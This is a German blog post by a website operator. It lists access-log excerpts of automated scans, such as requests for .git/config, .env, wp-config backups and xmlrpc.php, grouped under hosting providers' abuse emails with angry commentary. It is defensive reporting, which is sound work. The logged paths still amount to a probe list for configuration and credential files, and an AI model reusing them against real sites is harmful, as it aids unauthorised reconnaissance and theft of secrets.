185.177.72.205 website*3.com – – [13/Jul/2025:09:55:06 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
bucklog@proton.me – NEXT IP! HERE ALSO WITH 5 ATTEMPTS – VERY IGNORANT AND UNSECURE PROVIDER!!!
185.177.72.11 website*3.com – – [13/Jul/2025:11:59:37 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.11 website*3.com – – [13/Jul/2025:11:59:52 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.11 website*3.com – – [13/Jul/2025:11:59:52 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.11 website*3.com – – [13/Jul/2025:11:59:52 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.11 website*3.com – – [13/Jul/2025:11:59:52 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse@virtualine.org – HERE WITH 3 HACKER-IDIOTS!
198.55.98.182 website*3.com – – [13/Jul/2025:14:06:55 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36“
abuse@virtualine.org – VERY STUPID HACKER-IDIOT! – THIS IN NOT THE Googlebot!!!
198.55.98.91 website*3.com – – [13/Jul/2025:10:17:07 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)“
abuse@virtualine.org – VERY UNSECURE PROVIDER!!!
198.55.98.222 website*3.com – – [13/Jul/2025:15:08:15 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170×48)“

abuse@publicdomainregistry.com – NEXT ONE TODAY, VERY UNSECURE!
43.225.54.44 website*3.com – – [13/Jul/2025:10:35:20 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@amazonaws.com
2600:1f16:49a:9100:e737:8dcf:4962:9c0c website*3.com – – [13/Jul/2025:12:29:20 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
soc@viettel.com.vn – VERY IGNORANT AND UNSECURE PROVIDER!!!
115.78.7.179 website*3.com – – [13/Jul/2025:13:55:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@ionos.com – HERE WITH 4 ATTEMPTS – VERY UNSECURE!
74.208.59.233 website*7.com – – [13/Jul/2025:03:17:11 +0200] „GET /wp-config.php1 HTTP/1.0“ 403 – „-“ „-“
74.208.59.233 website*7.com – – [13/Jul/2025:03:17:11 +0200] „GET /wp-config.phpold HTTP/1.0“ 403 – „-“ „-“
74.208.59.233 website*7.com – – [13/Jul/2025:03:17:12 +0200] „GET /wp-config.php.org HTTP/1.0“ 403 – „-“ „-“
74.208.59.233 website*7.com – – [13/Jul/2025:03:17:12 +0200] „GET /wp-config HTTP/1.0“ 403 – „-“ „-“
anush@advinservers.com – VERY IGNORANT PROVIDER! – VERY UNSECURE!
2602:fb54:372:: website*7.com – – [13/Jul/2025:11:28:53 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fb54:372:: website*7.com – – [13/Jul/2025:11:29:10 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fb54:372:: website*7.com – – [13/Jul/2025:11:29:28 +0200] „GET /ss.php?f_c=1 HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fb54:372:: website*7.com – – [13/Jul/2025:11:29:45 +0200] „GET /ss.php?f_c=1 HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
abuse@microsoft.com – EVERY DAY MANY HACKING-ATTEMPTS – VERY UNSECURE!
20.127.100.39 website*7.com – – [13/Jul/2025:13:30:25 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:13:36:15 +0200] „HEAD /Wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:13:38:58 +0200] „HEAD /WORDPRESS HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:13:43:44 +0200] „HEAD /WordPress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:13:56:20 +0200] „HEAD /WP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:01:47 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:04:49 +0200] „HEAD /Old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:09:29 +0200] „HEAD /OLD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:11:06 +0200] „HEAD /oldsite HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:17:20 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:19:26 +0200] „HEAD /New HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:25:18 +0200] „HEAD /NEW HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:27:39 +0200] „HEAD /wp-old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:31:20 +0200] „HEAD /2022 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:35:47 +0200] „HEAD /2023 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:41:06 +0200] „HEAD /2024 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:14:43:30 +0200] „HEAD /2017 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
… and so on… VERY UNSECURE PROVIDER!!!

abuse@virtualine.org
198.55.98.222 website*7.com – – [13/Jul/2025:13:58:02 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5977.400 LBBROWSER/10.1.3752.400“
198.55.98.222 website*7.com – – [13/Jul/2025:14:24:49 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1220 Yowser/2.5 Safari/537.36“
abuse@microsoft.com – EVERY DAY MANY HACKING-ATTEMPTS – VERY UNSECURE!
20.127.100.39 website*7.com – – [13/Jul/2025:15:00:52 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:15:03:37 +0200] „HEAD /test HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
20.127.100.39 website*7.com – – [13/Jul/2025:15:07:02 +0200] „HEAD /Test HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“

noc@perfectip.net
74.81.43.210 website*1.com – – [14/Jul/2025:01:36:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
ipadm@lguplus.co.kr
2406:5900:3:6742:5708:3958:16b7:f19f website*1.com – – [14/Jul/2025:00:46:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@netcup.de
89.58.51.117 website*1.com – – [14/Jul/2025:03:20:22 +0200] „GET /app-ads.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“

abuse@register.it
185.2.4.33 website*1.com – – [14/Jul/2025:03:38:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@host4.biz
185.151.245.30 website*1.com – – [14/Jul/2025:04:48:35 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@ovh.net
2001:41d0:203:b338:: website*1.com – – [14/Jul/2025:05:24:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@microsoft.com
13.74.181.217 website*4.com – – [14/Jul/2025:02:14:05 +0200] „GET /randkeyword.PhP7 HTTP/1.0“ 403 – „-“ „-“
13.74.181.217 website*4.com – – [14/Jul/2025:02:14:05 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
abuse@contabo.de
173.249.2.8 website*4.com – – [14/Jul/2025:02:18:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@contabo.de – NEXT ONE CONTABO!
194.233.93.24 website*4.com – – [14/Jul/2025:04:04:48 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@charter.net
76.181.194.204 website*5.de – – [14/Jul/2025:02:55:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse@oracleemaildelivery.com
132.145.196.107 website*4.com – – [14/Jul/2025:04:55:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; en-US; rv:96.0) Gecko/20071914 Firefox/96.0“
abuse@sioru.com
80.251.219.111 website*4.com – – [14/Jul/2025:05:11:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

network-abuse@google.com
34.32.140.37 website*3.com – – [14/Jul/2025:02:52:24 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@worldhost.group
103.120.176.224 website*3.com – – [14/Jul/2025:03:41:59 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@vultr.com
149.28.128.19 website*3.com – – [14/Jul/2025:04:51:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@as210558.net – VERY IGNORANT PROVIDER – NO ANSWER AT ABUSE-MAILS!
45.141.215.30 website*3.com – – [14/Jul/2025:05:00:13 +0200] „GET /wp-admin/setup-config.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64)“
45.141.215.30 website*3.com – – [14/Jul/2025:05:00:13 +0200] „GET /wp/wp-admin/setup-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64)“
45.141.215.30 website*3.com – – [14/Jul/2025:05:00:13 +0200] „GET /blog/wp-admin/setup-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64)“
45.141.215.30 website*3.com – – [14/Jul/2025:05:00:13 +0200] „GET /new/wp-admin/setup-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64)“

abuse@liquidweb.com
104.207.254.234 website*3.com – – [14/Jul/2025:05:29:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@hostgator.in
50.116.87.40 website*3.com – – [14/Jul/2025:05:58:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@as41281.net
193.189.100.203 website*3.com – – [14/Jul/2025:06:12:00 +0200] „GET /bitcoin-bank-breaker/index-pl.html HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“

Nun schauen wir mal, wie viele Provider verantwortungsbewusst sind, sich seriös verhalten, ihre Sicherheitslücken beseitigen!!!

Die Provider sind da mit VERANTWORTLICH!

Protokoll-Auszüge vom 10 Juli 2025 – Wenn schon der PROVIDER selber VERSEUCHT ist!

Es ist z.T. echt unglaublich, was man so mit einigen eh fragwürdigen Providern erlebt. Dazu aber später mal mehr. 😉

HEUTE, fiel uns folgendes auf!

Ein absolut IGNORANTER und ARROGANTER PROVIDER ist:

AS214940 – KPROHOST LLC
Hosting Abuse: abuse@virtualine.org

Keinerlei Reaktion oder Antwort in Bezug auf unsere ABUSE-MELDUNGEN!

Hacker-Idioten, die über diesen fragwürdigen Provider kamen:

198.55.98.216 website*1.com – – [10/Jul/2025:02:42:52 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36“
198.55.98.216 website*2.de – – [10/Jul/2025:02:44:28 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)“
198.55.98.216 website*2.de – – [10/Jul/2025:02:46:49 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36“
198.55.98.216 website*3.com – – [10/Jul/2025:02:57:05 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; MI 8 SE Build/PKQ1.181121.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/7941 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN“
198.55.98.216 website*3.com – – [10/Jul/2025:02:57:10 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36“
198.55.98.216 website*4.de – – [10/Jul/2025:03:00:31 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux; rv:67.0) Gecko/20100101 Firefox/67.0“
198.55.98.216 website*4.de – – [10/Jul/2025:03:04:19 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 8.1.0; MI 5X Build/OPM1.171019.019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36“
198.55.98.216 website*4.de – – [10/Jul/2025:03:10:32 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/16G77 Safari/602.1“
198.55.98.216 website*5.com – – [10/Jul/2025:03:11:25 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 OPR/28.0.1750.40“

und etc… etc…

Naja, wenn der Provider schon selber versucht ist, das sagt ja wohl alles!

Provider Virtualine.ORG Verseucht

Solche Provider gehören SOFORT KOMPLETT GESPERRT! ABSOLUT VERANTWORTUNGSLOS in Bezug auf SICHERHEIT!

Protokoll-Auszüge vom 08 Juli 2025 – Wir nehmen diesen Hacker-Idioten ihre Spielzeuge weg!

Heute haben wir mal wieder so einige Abuse-Mails rausgeschickt! Immer eine Meldung an 5 mit verantwortliche Provider!

Bedauerlicherweise sind auch hier bisher nur von wenigen Providern eine Antwort und/oder Reaktion gekommen. Nun ja, alleine schon, das jeder sieht, was bei der Konkurrenz so abgeht, wird eine ganz bestimmte Wirkung haben, Haha!

Vielleicht kapieren auch diese kriminellen Hacker-Idioten und dummen Script-Kiddies, was ein 403 bedeutet und das die xmlrpc.php eh gesperrt ist!

Hier mal die Liste mit jeweils den Email-Adressen, Provider-Kennung, armseeliger Zugriffsversuch:

abuse@goteborg.se, ipadmin@cantv.com.ve,abuse@ptvtelecom.com, eig-abuse@endurance.com,eig-net-team@endurance.com,abuse@oracleemaildelivery.com

AS25387 – Goteborg Kommun
62.88.129.75 website*1.com – – [08/Jul/2025:05:30:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
AS8048 – CANTV Servicios, Venezuela
186.89.59.222 website*2.com – – [08/Jul/2025:05:32:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
AS34977 – PROCONO S.A.
37.61.155.189 website*2.com – – [08/Jul/2025:05:41:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
AS19871 – Network Solutions, LLC
50.6.155.36 website*1 – – [08/Jul/2025:05:48:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS31898 – Oracle Corporation – THIRD ABUSE-MAIL TODAY!!!
64.110.114.22 website*3.com – – [08/Jul/2025:05:49:20 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
—

csoc-hybridcloud@ans.co.uk, hm-changed@vnnic.vn,domain@inet.vn, abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,info@interdata.vn, abuse@korbank.pl

AS61323 – ANS ACADEMY LIMITED
31.193.2.236 website*1 – – [08/Jul/2025:05:51:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*1“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
AS149068 – iNET software one member company limited
103.72.97.210 website*1 – – [08/Jul/2025:06:05:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
AS51167 – Contabo GmbH
2a02:c202:2069:1889::1 website*2.com – – [08/Jul/2025:06:08:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*2.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
AS151858 – INTERDIGI JOINT STOCK COMPANY
103.173.227.188 website*1 – – [08/Jul/2025:06:26:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*1“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
AS35179 – Korbank S. A.
2a01:96e0:0:545:3::6 website*2.com – – [08/Jul/2025:06:44:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*2.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
—

tencent_noc@tencent.com,tencent_idc@tencent.com,abuse@ovh.net, ncn@symphony.net.th, ip-admin@violin.co.th, abuse@worldhost.group,ipas@cnnic.cn,abuse@alibaba-inc.com

AS45090 – Shenzhen Tencent Computer Systems Company Limited – TENCENT IS COMPLETE UNWANTED – COMPLETE BLOCKED!
94.191.24.214 website*2.com – – [08/Jul/2025:04:26:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
AS16276 – OVH SAS – THIRD ABUSE MAIL TODAY!!!
198.244.233.124 website*1 – – [08/Jul/2025:04:36:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*1“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
AS132280 – Symphony Communication (Thailand) PCL.
161.82.200.37 website*1 – – [08/Jul/2025:04:52:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
AS199404 – WHG Hosting Services Ltd
190.92.174.33 website*2.com – – [08/Jul/2025:04:55:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – THIRD ABUSE-MAIL TODAY! – ALIBABA IS COMPLETE UNWANTED – COMPLETE BLOCKED!
120.76.230.30 website*2.com – – [08/Jul/2025:05:04:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
—

ipas@cnnic.cn,abuse@alibaba-inc.com,abuse@ote.gr,registro_br@lpnet.com.br, abuse@namecheaphosting.com,manager@ipv4broker.eu,

AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – SECOND ABUSE-MAIL TODAY! – ALIBABA IS COMPLETE UNWANTED – COMPLETE BLOCKED!
120.24.23.234 website*2.com – – [08/Jul/2025:03:48:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS6799 – Ote SA (Hellenic Telecommunications Organisation)
2a02:587:b47f:3300:3948:c8d3:1c6e:ef34 website*4.de – – [08/Jul/2025:03:49:31 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; x86) AppleWebKit/537.36 (KHTML, like Gecko) Edge/84.0.0.0 Safari/537.36“
AS28668 – Desktop Sigmanet Comunicação Multimídia SA
179.108.1.20 website*4.de – – [08/Jul/2025:03:51:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/60.0.0.0 Safari/537.36“
AS22612 – Namecheap, Inc.
198.54.125.232 website*1 – – [08/Jul/2025:04:14:35 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS212607 – Saeid Shahrokhi
5.10.248.130 website*2.com – – [08/Jul/2025:04:17:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http:// website*2.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
—

hm-changed@vnnic.vn,abuse@ovh.net,operations-support@expedient.com,ipm@expedient.com,hostmaster@nic.ad.jp, ipas@cnnic.cn,abuse@alibaba-inc.com

AS45899 – VNPT Corp
